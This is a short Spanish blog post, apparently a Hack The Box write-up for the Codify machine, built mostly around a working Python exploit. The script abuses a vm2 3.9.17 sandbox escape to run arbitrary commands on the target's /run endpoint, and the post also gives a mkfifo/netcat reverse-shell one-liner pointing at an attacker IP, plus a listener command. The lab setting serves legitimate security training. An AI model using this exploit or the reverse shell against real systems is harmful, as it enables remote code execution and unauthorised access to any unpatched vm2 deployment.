VM2 3.9.17
- Este script se usó para escapar del sandbox vm2@3.9.17 en la máquina Codify de HTB. Podemos llegar a injectar comandos “RCE” y entablar una revshell. Más info en este PoC
- Ejecutar Revshell con mkfifo:
- Shell RCE $>
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc [tuIP] [PortListener] >/tmp/f - KALI $>
sudo nc -nlvp [PortListener]
- Shell RCE $>
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
#!/bin/python3
import requests
import base64
import json
url = 'http://codify.htb:3000/run'
headers = {
'Content-Type': 'application/json',
}
def send_request(command):
raw_code = (
'const { VM } = require("vm2");\n'
'const vm = new VM();\n\n'
'const code = `\n'
' const err = new Error();\n'
' err.name = {\n'
' toString: new Proxy(() => "", {\n'
' apply(target, thiz, args) {\n'
f' const process = args.constructor.constructor("return process")();\n'
f' throw process.mainModule.require("child_process").execSync("{command}").toString();\n'
' },\n'
' }),\n'
' };\n'
' try {\n'
' err.stack;\n'
' } catch (stdout) {\n'
' stdout;\n'
' }\n'
'`;\n\n'
'console.log(vm.run(code)); // RCE'
)
encoded_code = base64.b64encode(raw_code.encode()).decode()
payload = json.dumps({"code": encoded_code})
response = requests.post(url, headers=headers, data=payload)
return response
print("Shell, introduce un comando")
while True:
try:
commandUser = input("$> ")
if commandUser.lower() == "exit":
break
else:
response = send_request(commandUser)
response_data = response.json()
command_output = response_data.get('output', '').strip()
print(command_output)
except KeyboardInterrupt:
print("\033[91m[*] Saliendo...\033[0m")
break
This post is licensed under CC BY 4.0 by the author.